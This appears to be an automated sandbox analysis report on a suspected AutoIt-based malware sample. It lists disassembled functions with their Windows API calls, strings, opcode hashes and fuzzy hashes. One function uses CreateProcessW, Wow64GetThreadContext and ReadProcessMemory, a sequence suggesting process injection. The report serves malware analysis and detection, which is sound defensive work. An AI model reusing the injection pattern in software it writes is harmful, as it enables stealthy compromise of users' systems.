                                                                      • Opcode ID: ed522ae7cb353b07cdcf0c28f31c659a28aa978a19c3c35e918f68bbc55002ca
                                                                      • Instruction ID: 09932522aeaed6907711cc3bf38f54f8981aa384d5eb3ad952020847dc374687
                                                                      • Opcode Fuzzy Hash: ed522ae7cb353b07cdcf0c28f31c659a28aa978a19c3c35e918f68bbc55002ca
                                                                      • Instruction Fuzzy Hash: 7751B230D04249EBEF11DBE4D854BEEBB79AF58700F004199E648BB2C0DB7A5B44CB65
                                                                      Function 0051407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1491 51407c-514092 1492 514098-5140ad call 517a16 1491->1492 1493 51416f-514173 1491->1493 1496 5140b3-5140d3 call 517bcc 1492->1496 1497 54d3c8-54d3d7 LoadStringW 1492->1497 1499 54d3e2-54d3fa call 517b2e call 516fe3 1496->1499 1502 5140d9-5140dd 1496->1502 1497->1499 1509 5140ed-51416a call 532de0 call 51454e call 532dbc Shell_NotifyIconW call 515904 1499->1509 1513 54d400-54d41e call 517cab call 516fe3 call 517cab 1499->1513 1503 5140e3-5140e8 call 517b2e 1502->1503 1504 514174-51417d call 518047 1502->1504 1503->1509 1504->1509 1509->1493 1513->1509
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0054D3D7
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • _memset.LIBCMT ref: 005140FC
                                                                      • _wcscpy.LIBCMT ref: 00514150
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00514160
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3942752672-1585850449
                                                                      • Opcode ID: 1aaf6cafa9b112c868642c68d213e23461e08175ebc3b55dadac3f11eec8d787
                                                                      • Instruction ID: 41894f637fbb7b3a6f71daaf06bebd0bd28a8db06b05976ea652300ecc94d463
                                                                      • Opcode Fuzzy Hash: 1aaf6cafa9b112c868642c68d213e23461e08175ebc3b55dadac3f11eec8d787
                                                                      • Instruction Fuzzy Hash: 3C31A171008706AAE730EB64DC49BDB7FE8BF98304F10491BF58592191EB70968DCB92
                                                                      Function 0051686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00514DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00514E0F
                                                                      • _free.LIBCMT ref: 0054E263
                                                                      • _free.LIBCMT ref: 0054E2AA
                                                                        • Part of subcall function 00516A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00516BAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                      • API String ID: 2861923089-1757145024
                                                                      • Opcode ID: c69b8d7551c03d9e8f83886214e8f7c66ee0a71cbe7c521e83765b79465023d6
                                                                      • Instruction ID: 51e9658158e10cf4447849823e8ae6bca6a91c90284a800fcc69ca97c6cc2adc
                                                                      • Opcode Fuzzy Hash: c69b8d7551c03d9e8f83886214e8f7c66ee0a71cbe7c521e83765b79465023d6
                                                                      • Instruction Fuzzy Hash: 5F917C7190421AAFDF04EFA4D89A9EDBFB8FF48314F144429F815AB2A1DB709945CB50
                                                                      Function 005135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005135A1,SwapMouseButtons,00000004,?), ref: 005135D4
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005135A1,SwapMouseButtons,00000004,?,?,?,?,00512754), ref: 005135F5
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,005135A1,SwapMouseButtons,00000004,?,?,?,?,00512754), ref: 00513617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 94210e51a614107d56a896ac797321b0d29f3d785ec683c7988996d65fe33aa4
                                                                      • Instruction ID: 4f0a91a34aee029eac50afe4a44ed4fe9fabbc8a80386d1433003dc61099b222
                                                                      • Opcode Fuzzy Hash: 94210e51a614107d56a896ac797321b0d29f3d785ec683c7988996d65fe33aa4
                                                                      • Instruction Fuzzy Hash: B9114871610208BFEB208F64DC949EEBBBCFF44740F01446AE805D7210D2719E94A760
                                                                      Function 01035268 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01035A23
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01035AB9
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01035ADB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction ID: b43294114c6f13d21ea0551b1e7701ce8b0b09d53d050482f483a88466ea30a2
                                                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction Fuzzy Hash: 89621C30A146189BEB24DFA4CC54BDEB376EF98300F1091A9D14DEB3A0E7759E81CB59
                                                                      Function 0057955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00514EE5: _fseek.LIBCMT ref: 00514EFD
                                                                        • Part of subcall function 00579734: _wcscmp.LIBCMT ref: 00579824
                                                                        • Part of subcall function 00579734: _wcscmp.LIBCMT ref: 00579837
                                                                      • _free.LIBCMT ref: 005796A2
                                                                      • _free.LIBCMT ref: 005796A9
                                                                      • _free.LIBCMT ref: 00579714
                                                                        • Part of subcall function 00532D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00539A24), ref: 00532D69
                                                                        • Part of subcall function 00532D55: GetLastError.KERNEL32(00000000,?,00539A24), ref: 00532D7B
                                                                      • _free.LIBCMT ref: 0057971C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                      • String ID:
                                                                      • API String ID: 1552873950-0
                                                                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                      • Instruction ID: 3f36529ba73fc67415253c82b025d1f1c402706df833349beb7b44260686e2a7
                                                                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                      • Instruction Fuzzy Hash: 08514BB1904259ABDF249F64DC85AAEBBB9FF88300F10449EF20DA7341DB715A81CF58
                                                                      Function 0053470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                      • String ID:
                                                                      • API String ID: 2782032738-0
                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction ID: 5bb00aff08284f3389ab7886bd1a008d146279213416d59a5585cf36d4d4d72a
                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction Fuzzy Hash: 5F41C475A007469BDB18CEA9C8949AEBFA5FF82360F24857DE815C7640D770FD428F40
                                                                      Function 005144A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 005144CF
                                                                        • Part of subcall function 0051407C: _memset.LIBCMT ref: 005140FC
                                                                        • Part of subcall function 0051407C: _wcscpy.LIBCMT ref: 00514150
                                                                        • Part of subcall function 0051407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00514160
                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00514524
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00514533
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0054D4B9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1378193009-0
                                                                      • Opcode ID: c70ece3c86238110236bd72de48842237cea863d571b311ecddc60d0e6fa5759
                                                                      • Instruction ID: c6871bd3994b495e5771c788031296d020654621a5ee57969a235d1461c40e66
                                                                      • Opcode Fuzzy Hash: c70ece3c86238110236bd72de48842237cea863d571b311ecddc60d0e6fa5759
                                                                      • Instruction Fuzzy Hash: EA21C5745047849FFB328B249859BE6BFFCBB15318F04049EE69E96281D3B42988DB51
                                                                      Function 00514C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: AU3!P/Z$EA06
                                                                      • API String ID: 4104443479-4150073145
                                                                      • Opcode ID: 93d0b4013fdc4460a7789af4803e3b9c654491734ad7bdf8d01e878c59979f5b
                                                                      • Instruction ID: 3bd00a317899ec60b015014202242e767065fe2166c95f3d71b1100905eb2cb6
                                                                      • Opcode Fuzzy Hash: 93d0b4013fdc4460a7789af4803e3b9c654491734ad7bdf8d01e878c59979f5b
                                                                      • Instruction Fuzzy Hash: 7E41A031A0415957FF219B64E8557FE7FB2BB85300F286875EC829B282D6305DC48BA2
                                                                      Function 00517285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0054EA39
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0054EA83
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                        • Part of subcall function 00530791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005307B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                      • String ID: X
                                                                      • API String ID: 3777226403-3081909835
                                                                      • Opcode ID: 6239e3f3c11098109dbb8c697cb8b51de7372b51983f6d62901e529d99b5b5ff
                                                                      • Instruction ID: 7a897adcdea16c2934624b12a8538c97a1b8d7d1edd3beaa63886cb96948d3e7
                                                                      • Opcode Fuzzy Hash: 6239e3f3c11098109dbb8c697cb8b51de7372b51983f6d62901e529d99b5b5ff
                                                                      • Instruction Fuzzy Hash: DD21C370A042599BDF019FD8C849BEE7FF8BF88714F00441AE408AB241DBB459898FA1
                                                                      Function 005798E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 005798F8
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0057990F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: 0889c28a064121ac20f3bba7a79f07e4a640782dc74266b80d55c2bda8e8fe58
                                                                      • Instruction ID: 002da8be18558dc2bab42ec0d9cd7ffa5a499f7c121a8a2a04dfc4b3805ec4bb
                                                                      • Opcode Fuzzy Hash: 0889c28a064121ac20f3bba7a79f07e4a640782dc74266b80d55c2bda8e8fe58
                                                                      • Instruction Fuzzy Hash: C5D05E7954030DABDF509BA0DC0EFAA7B3CE714700F0006B2BA54D10A1EAB095989B91
                                                                      Function 0058CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 234d2b0bd760d0ccf13a2949cb0296867d555c247442cae0861d516d9eade245
                                                                      • Instruction ID: a03c959fab01b7420a0cc34ef0db043f90543f2093d8c9df809056df8ac67b86
                                                                      • Opcode Fuzzy Hash: 234d2b0bd760d0ccf13a2949cb0296867d555c247442cae0861d516d9eade245
                                                                      • Instruction Fuzzy Hash: 9EF123706083419FDB14EF28C485A6ABBE5FF88314F14892EF899AB251D730E945CF92
                                                                      Function 0051434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00514370
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00514415
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00514432
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$_memset
                                                                      • String ID:
                                                                      • API String ID: 1505330794-0
                                                                      • Opcode ID: 44e87929f7294342410f7593df14bf2860ff0c36669bb474b3e4f644de963bcc
                                                                      • Instruction ID: 7d9cb15ba76852e34f0f2be731a587c61d4a1ad8797aa14fdc366990234f0698
                                                                      • Opcode Fuzzy Hash: 44e87929f7294342410f7593df14bf2860ff0c36669bb474b3e4f644de963bcc
                                                                      • Instruction Fuzzy Hash: 7C313EB05057019FD721DF24D8856EBBFF8FB58309F000D2EE59AC6251E771A988DB52
                                                                      Function 0053571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __FF_MSGBANNER.LIBCMT ref: 00535733
                                                                        • Part of subcall function 0053A16B: __NMSG_WRITE.LIBCMT ref: 0053A192
                                                                        • Part of subcall function 0053A16B: __NMSG_WRITE.LIBCMT ref: 0053A19C
                                                                      • __NMSG_WRITE.LIBCMT ref: 0053573A
                                                                        • Part of subcall function 0053A1C8: GetModuleFileNameW.KERNEL32(00000000,005D33BA,00000104,?,00000001,00000000), ref: 0053A25A
                                                                        • Part of subcall function 0053A1C8: ___crtMessageBoxW.LIBCMT ref: 0053A308
                                                                        • Part of subcall function 0053309F: ___crtCorExitProcess.LIBCMT ref: 005330A5
                                                                        • Part of subcall function 0053309F: ExitProcess.KERNEL32 ref: 005330AE
                                                                        • Part of subcall function 00538B28: __getptd_noexit.LIBCMT ref: 00538B28
                                                                      • RtlAllocateHeap.NTDLL(00FF0000,00000000,00000001,00000000,?,?,?,00530DD3,?), ref: 0053575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 1372826849-0
                                                                      • Opcode ID: 69bb01cba37540af1692cf879c54b96f5a04ff8c192acfcc3ead7fd912cce2b3
                                                                      • Instruction ID: 4546e8e7074b8433f9489699b7037ed9b8c6df902796c9410095ee078ea57b33
                                                                      • Opcode Fuzzy Hash: 69bb01cba37540af1692cf879c54b96f5a04ff8c192acfcc3ead7fd912cce2b3
                                                                      • Instruction Fuzzy Hash: CE01B535241B03DAD7152734EC5AB3E7F48FBD27A1F101936F4059A191EF709C409661
                                                                      Function 005798A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00579548,?,?,?,?,?,00000004), ref: 005798BB
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00579548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 005798D1
                                                                      • CloseHandle.KERNEL32(00000000,?,00579548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005798D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: c0b6e3a4919a0c9335574e856af10723589ae5d763131ce31cc39cc51c5fff3c
                                                                      • Instruction ID: 869ebdcaa4987a6a32ca6390db155268068b4abe3418bb3b84a5c194dcb76972
                                                                      • Opcode Fuzzy Hash: c0b6e3a4919a0c9335574e856af10723589ae5d763131ce31cc39cc51c5fff3c
                                                                      • Instruction Fuzzy Hash: B2E08632140224B7D7211B64EC09FCA7F19EB16761F118121FB14A90E087B11515B7D8
                                                                      Function 0051A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CALL
                                                                      • API String ID: 0-4196123274
                                                                      • Opcode ID: 2169dba4d28b63ab3f6e0e343fd6112f9d69c5fa17c342048d3e6c36ae0edd5e
                                                                      • Instruction ID: a83957d93832249604fbf7bdeab623feb40c8dc954f3bde6f7284b2a740d22e1
                                                                      • Opcode Fuzzy Hash: 2169dba4d28b63ab3f6e0e343fd6112f9d69c5fa17c342048d3e6c36ae0edd5e
                                                                      • Instruction Fuzzy Hash: 5D227874509301DFEB25DF14C494AAABFE1BF85304F15896DE88A8B362D731EC85DB82
                                                                      Function 00517A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
